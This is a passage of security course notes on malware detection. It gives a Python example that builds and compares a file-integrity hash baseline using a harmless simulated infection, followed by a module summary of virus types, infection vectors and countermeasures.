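The integrity-checking method described earlier in this module and steps 10 and 11 above (compare file hashes against a pre-computed hash or a backup copy) are the same operation: record a baseline of hashes, then diff the live system against it. The following Python is an added example, not FCIV, Tripwire, or any courseware code. It builds a baseline of SHA-256 hashes for a directory tree, compares a later snapshot against it, and reports modified, added, and deleted files. The demo() function constructs a throw-away tree in a temporary directory and simulates an infection plus one legitimate edit, so it runs offline; the file names in it are invented. It does not cover boot sectors, which real integrity products also hash.

```python
"""Added example: a file-integrity baseline and comparison (not courseware code).

Baseline = {relative path: {"sha256": hex, "size": bytes}}. compare() works
equally well when one side was built from a known-good backup copy.
"""
from __future__ import annotations

import hashlib
import json
import os
import tempfile

CHUNK = 1 << 16


def file_sha256(path: str) -> str:
    """Hex SHA-256 of a file, read in chunks so large binaries do not need RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root: str) -> dict[str, dict]:
    """Hash every regular file under root, keyed by a forward-slash relative path."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            if not os.path.isfile(full):
                continue  # skip sockets, broken symlinks and similar
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = {"sha256": file_sha256(full), "size": os.path.getsize(full)}
    return baseline


def save_baseline(baseline: dict, path: str) -> None:
    """Persist the baseline. Keep this copy offline or read-only: a virus that
    can rewrite the baseline can hide from the checker."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(baseline, fh, indent=1, sort_keys=True)


def load_baseline(path: str) -> dict[str, dict]:
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def compare(baseline: dict[str, dict], current: dict[str, dict]) -> dict[str, list[str]]:
    """Diff two snapshots. Any content change is 'modified': the checker cannot
    tell a virus write from a legitimate edit or a buggy program's corruption."""
    old, new = set(baseline), set(current)
    return {
        "modified": sorted(p for p in old & new
                           if baseline[p]["sha256"] != current[p]["sha256"]),
        "added": sorted(new - old),
        "deleted": sorted(old - new),
    }


def _write(root: str, rel: str, data: bytes) -> None:
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(data)


def demo() -> dict[str, list[str]]:
    """Constructed scenario: take a baseline, then 'infect' the tree and re-check."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        _write(root, "bin/app.exe", b"MZ" + b"\x90" * 64)
        _write(root, "bin/helper.dll", b"MZ" + b"\x00" * 32)
        _write(root, "docs/notes.txt", b"meeting at 10\n")
        baseline_path = os.path.join(store, "baseline.json")  # kept outside root
        save_baseline(build_baseline(root), baseline_path)

        # Simulated virus: prepends itself to app.exe, drops a file, deletes one.
        app = os.path.join(root, "bin", "app.exe")
        with open(app, "r+b") as fh:
            body = fh.read()
            fh.seek(0)
            fh.write(b"VIRUS" + body)
        _write(root, "bin/update.exe", b"MZ" + b"VIRUS")
        os.remove(os.path.join(root, "bin", "helper.dll"))
        # A legitimate user edit, which the checker reports exactly like the virus.
        _write(root, "docs/notes.txt", b"meeting at 11\n")

        return compare(load_baseline(baseline_path), build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

In practice you build the baseline from a clean install (or from the backup copy step 11 mentions), store it off the host, and re-run build_baseline() plus compare() on the live system. The demo report lists docs/notes.txt next to bin/app.exe under "modified", which is the limitation the integrity checking section states: the checker sees that a file changed, not why, so every reported path still needs a human or a second technique (signature or code analysis) to classify it.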
• 105. Module Summary
- A virus is a self-replicating program that produces its own code by attaching copies of itself to other executable code, whereas worms are malicious programs that replicate, execute, and spread across network connections independently, without human interaction.
- Some viruses affect computers as soon as their code is executed; other viruses lie dormant until a pre-determined logical condition is met.
- Viruses are categorized according to the files they infect and the way they work.
- The lifecycle of viruses and worms includes the design, replication, launch, detection, incorporation, and elimination stages.
- A computer gets infected by viruses, worms, and other malware due to not running the latest antivirus application, not updating or installing new versions of plug-ins, installing pirated software, opening infected email attachments, or downloading files without properly checking their source.
- Several virus and worm development kits, such as JPS Virus Maker, are available in the wild and can be used to create malware without any technical knowledge.
- Virus detection methods include system scanning, file integrity checking, and monitoring OS requests.
- Virus and worm countermeasures include installing antivirus software and following an antivirus policy for safe computing.
Module 07 Pages 1110-1111